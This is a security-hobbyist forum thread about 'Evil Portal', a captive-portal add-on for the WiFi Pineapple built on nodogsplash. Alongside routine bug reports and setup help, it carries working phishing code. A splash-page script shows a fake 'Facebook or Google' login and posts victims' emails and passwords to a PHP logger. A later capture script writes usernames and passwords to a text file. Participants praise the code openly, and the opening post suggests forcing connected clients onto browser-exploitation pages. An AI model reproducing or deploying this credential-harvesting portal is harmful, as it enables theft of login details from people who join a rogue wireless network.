Jump to content

Evil Portal - Captive Portal


newbi3

Recommended Posts

Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live).

Here's some media:

This video goes along with a tutorial I made: click here

ohl5lc.png16beope.png

Edited by newbi3
Link to comment
Share on other sites

Newbi3, great infusion. As you know there is a typo under the configuration tab step 3 where it says "FilrewallRule allow tcp port 1471" to anyone who is going to post about this small typo, it should be "FirewallRule allow tcp port 1471". Great infusion man keep up the good work.

Link to comment
Share on other sites

Newbi3, great infusion. As you know there is a typo under the configuration tab step 3 where it says "FilrewallRule allow tcp port 1471" to anyone who is going to post about this small typo, it should be "FirewallRule allow tcp port 1471". Great infusion man keep up the good work.

Fixed in version 1.1 should be available to update shortly available now, please update :)

Edited by newbi3
Link to comment
Share on other sites

Just a quick bug to report. In version 1.1 the startup button the small tile does nothing, I copied and pasted the code I wrote from the large tile and forgot the important parts of it. This will be fixed in version 1.2 which will be available shortly :) The update also includes a stop and disable button requested by skysploit. Please PM or post any more suggestions you may have!

Version 1.2 is now available for download so please update. The start button on the small tile has been fixed along with a stop and disable button added to the small tile and large tile. Enjoy!

Edited by newbi3
Link to comment
Share on other sites

  • 2 months later...

Great stuff, I am working to create a captive portal but i need to put in some of my own PHP, at the moment it is being commented out and not being processed. Does anyone know how to make it process PHP, i looked at the UHTTP deamon and it has the php interpreter listed in it but i have no clue what to do next.

Sorry i am new to this and have spent the last few hours trying to get this working, any help would be greatly appreciated (sorry if this is the wrong place)

Link to comment
Share on other sites

Great stuff, I am working to create a captive portal but i need to put in some of my own PHP, at the moment it is being commented out and not being processed. Does anyone know how to make it process PHP, i looked at the UHTTP deamon and it has the php interpreter listed in it but i have no clue what to do next.

Sorry i am new to this and have spent the last few hours trying to get this working, any help would be greatly appreciated (sorry if this is the wrong place)

PHP cannot be processed by the nodogsplash webserver. If you want to use php I suggest you write all of your php in /www and create an iframe pointed at 172.16.42.1:8080/myphpfile.php

Link to comment
Share on other sites

PHP cannot be processed by the nodogsplash webserver. If you want to use php I suggest you write all of your php in /www and create an iframe pointed at 172.16.42.1:8080/myphpfile.php

Yeh i had a temp solution of using an Iframe but was hoping to have it directly processed, I thought that nodog used UHTTP web server but i see now it uses its own. Thanks.

Link to comment
Share on other sites

  • 2 months later...
  • 2 weeks later...

Hey guys. I've just picked up a mark V pineapple and started playing around with the Evil Portal infusion. Major thanks to newbi3 for porting this to an infusion! I looking for some guidance on possibly expanding the nodogsplash page capabilities. I am trying to configure the splash page to point to an index page of a custom captive portal containing multiple pages with java content and full stylesheet coding, all stored on the sd card of the pineapple. For instance, when nodogsplash is running all requests would redirect to the main portal landing page which would have links to other pages such as a seperate terms of service page, another page containing some relevant content, and another page that has a false login form to gather a username and password. The user would be free to navigate between all the pages in the portal, and not be able to browse through the gateway until the user fills out the login form and clicks the submit button to send the $authtarget response back to nodogsplash to authenticate the user and redirect to the origonal page requested.

I am stuck on successfully getting the splash page to load from the sd card. As nodogsplash was coded to look for the splash page in /etc/nodogsplash/htdocs and have all graphics stored in /etc/nodogsplash/images location.

I have tried a few configuration changes with no success such as creating symbolic links to point /etc/nodogsplash/htdocs/splash.html to /sd/www/customportalindex.html, a sym link from /www to /sd/www plus adding an iframe to splash.html that points to 172.16.42.1:8080/customportalindex.html.

When I try the iframe reference in splash.html I can navigate to 172.16.42.1:8080/customportalindex.html page successfully but when nodogsplash loads the iframe it loops into itself and loads iframes into iframes infinitely.

Any thoughts, suggestions, or feedback would be greatly appreciated.

Link to comment
Share on other sites

Hey guys. I've just picked up a mark V pineapple and started playing around with the Evil Portal infusion. Major thanks to newbi3 for porting this to an infusion! I looking for some guidance on possibly expanding the nodogsplash page capabilities. I am trying to configure the splash page to point to an index page of a custom captive portal containing multiple pages with java content and full stylesheet coding, all stored on the sd card of the pineapple. For instance, when nodogsplash is running all requests would redirect to the main portal landing page which would have links to other pages such as a seperate terms of service page, another page containing some relevant content, and another page that has a false login form to gather a username and password. The user would be free to navigate between all the pages in the portal, and not be able to browse through the gateway until the user fills out the login form and clicks the submit button to send the $authtarget response back to nodogsplash to authenticate the user and redirect to the origonal page requested.

I am stuck on successfully getting the splash page to load from the sd card. As nodogsplash was coded to look for the splash page in /etc/nodogsplash/htdocs and have all graphics stored in /etc/nodogsplash/images location.

I have tried a few configuration changes with no success such as creating symbolic links to point /etc/nodogsplash/htdocs/splash.html to /sd/www/customportalindex.html, a sym link from /www to /sd/www plus adding an iframe to splash.html that points to 172.16.42.1:8080/customportalindex.html.

When I try the iframe reference in splash.html I can navigate to 172.16.42.1:8080/customportalindex.html page successfully but when nodogsplash loads the iframe it loops into itself and loads iframes into iframes infinitely.

Any thoughts, suggestions, or feedback would be greatly appreciated.

While I was building the infusion I was sucessfuly able to do what you are trying to do. Please post your code and remember to wrap it in the code tags

Link to comment
Share on other sites

  • 4 weeks later...
  • 3 months later...

Followed the instructions down to the tee, uhttp seems to be running based on the rule. However when starting the nodogsplash, the page appears correctly, yet it took down the whole internet routing for the connected device, no more internet access, everything is routed to nodogsplash page. I thought this is supposed to just the main page, not interrupting the whole internet. Did I do anything wrong? Or is nodogsplash suppose to do that?

Link to comment
Share on other sites

  • 4 weeks later...

Followed the instructions down to the tee, uhttp seems to be running based on the rule. However when starting the nodogsplash, the page appears correctly, yet it took down the whole internet routing for the connected device, no more internet access, everything is routed to nodogsplash page. I thought this is supposed to just the main page, not interrupting the whole internet. Did I do anything wrong? Or is nodogsplash suppose to do that?

Nodogsplash prevents users from getting on the internet until they complete a task, agree to terms of service, enter a password, or in the default case click a dog. After you click on the image of the dog you will have internet access back.

Link to comment
Share on other sites

  • 2 months later...

I know this topic is a little old now but I recently bought a Mark V and started playing with this awesome infusion yesterday. For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.

Within splash.html

<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>

As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.

<script>
    $(function() {
        $("#submit_button").on("click", function() {
            var email_addr = $('#email').val();
            var pass = $('#password').val();
            if (email_addr == "" || pass == "") {
                alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/nodogsplash/auth.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
             });
    });
</script>

In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.

And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.

<?php

if (isset($_POST['email'])) {
        $fh = fopen('auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        echo json_encode(array("key", "val"));
        return;
} else {
        header('Location: splash.html');
}

?>

I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.

Link to comment
Share on other sites

I know this topic is a little old now but I recently bought a Mark V and started playing with this awesome infusion yesterday. For those having issues using PHP I have a solution I discovered today. If you place your PHP, JavaScript, and CSS files in the /www directory you can import them into the splash.html page by using your Pineapple's IP address that is also recorded in the preauthenticated_users area of the Evil Portal configuration. Here are some examples of how I got an Ajax call to send the username and password entered by a victim to an auth.php script and log it to auth.log.

Within splash.html

<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>

As you can probably guess in /www I created a new directory called nodogsplash and placed my jquery.min.js file there. This way when the splash.html page tries to access it on behalf of the victim it doesn't return the splash.html page code (due to a redirect not allowing the user past the captive portal). This same method can be applied to your PHP scripts.

<script>
    $(function() {
        $("#submit_button").on("click", function() {
            var email_addr = $('#email').val();
            var pass = $('#password').val();
            if (email_addr == "" || pass == "") {
                alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/nodogsplash/auth.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
             });
    });
</script>

In the code above I first perform a check to ensure the victim has entered their username and password then send the data off to my auth.php script in /www/nodogsplash where it is logged in auth.log. Right now it authenticates the user regardless of whether the call to auth.php was successful or not but I'll change that soon.

And just for the purpose of completion here is my auth.php script so you can see exactly what is happening when the AJAX call is made.

<?php

if (isset($_POST['email'])) {
        $fh = fopen('auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        echo json_encode(array("key", "val"));
        return;
} else {
        header('Location: splash.html');
}

?>

I have tested this and it works for me so I hope this helps everyone who is having trouble with using JavaScript and PHP in nodogsplash.

Go ahead and post this in the topic for Evil Portal on the MK V just put a disclaimer in there that says something to the effect of: Don't ask questions about this, this goes outside the scope of the support for Evil Portal.

Great work btw

Link to comment
Share on other sites

  • 4 months later...

Hi Friends!

I've spent an insane amount of time on this last bit of code. I've used the google-fu as best I can for being relatively noobish, I've read through all the 'Evil Portal' searches I can find. I'm relatively new to code, so please bare with me.

With that said, I'm having a problem with redirects.

I have an evil portal deployed it dumps the username, password, redirect then the token to a text file. (the reason I'm currently dumping the last two is for troubleshooting).

When I click my final link and start the capture everything goes through and is logged correctly into the capture file.

Afterwords the capture my redirect takes me to:

"http://192.168.10.1/capture.php?Email=547,&Password=547,&redir1=http://192.168.10.1:8080/nodogsplash_auth/?redir=http%3A%2F%2Fwww.test.com%2F&tok=8af6d405"

which then redirects to:

http://192.168.10.1:8080/nodogsplash_auth/?redir=http://www.test.com/

somehow I'm losing the token on the 2nd redirect, also it seems that I'm picking up more than just the path of the redirect when I use the $redir var.

If I pump in "http://www.test.com/tok=8af6d405" everything works just fine, validates and online.

Here is my java:
<script type="text/javascript" charset="utf-8">
  function submitTextToCapture() {
    var email = document.getElementById("Email").value;
    var password = document.getElementById("Passwd").value;
    window.location = "http://192.168.10.1/capture.php?Email="+email+",&Password="+password+",&redir1=$authtarget";
  }
</script>
PHP
<?php

$username = $_GET["Email"];
$password = $_GET["Password"];
$redir = $_GET["redir1"];
$token = $_GET["tok"];

$file = fopen("stored.txt", "a");
fwrite($file, $username . $password . $redir . $token . "\n");
fclose($file);

echo '<script type="text/javascript">window.location = "' . $redir . '";</script>';

?>

Button stuff:

<form id="PWND" method="POST" action="http://192.168.10.1/capture.php">


<label class="hidden" for="Email">Email</label>
<input id="Email" name="Email" type="Email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="Password" placeholder="Password" class="">


<input type="button" class="rc-button rc-button-submit" onClick="submitTextToCapture()" value="Sign in" src="$authtarget"> 

it looks like I need to cut this (http://192.168.10.1:8080/nodogsplash_auth/) string in the first link and I can manage but it looks like that is loaded into the redir variable from the get go?

Any help would be much appreciated.

Link to comment
Share on other sites

  • 6 years later...

This is a really old thread so I guess response will be rather limited. To your question, I would probably say: "nothing". You most likely have to tweak the Evil Portal module code. The target gets connected and gets network access, that message just shows up. If you continue to browse, your target will browse the web as intended. I can't remember off the top of my head where it is located, but just search for that string and you will find where it is located in the module code structure. Then change/tweak/correct it as you desire to get another response.

  • Thanks 1
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...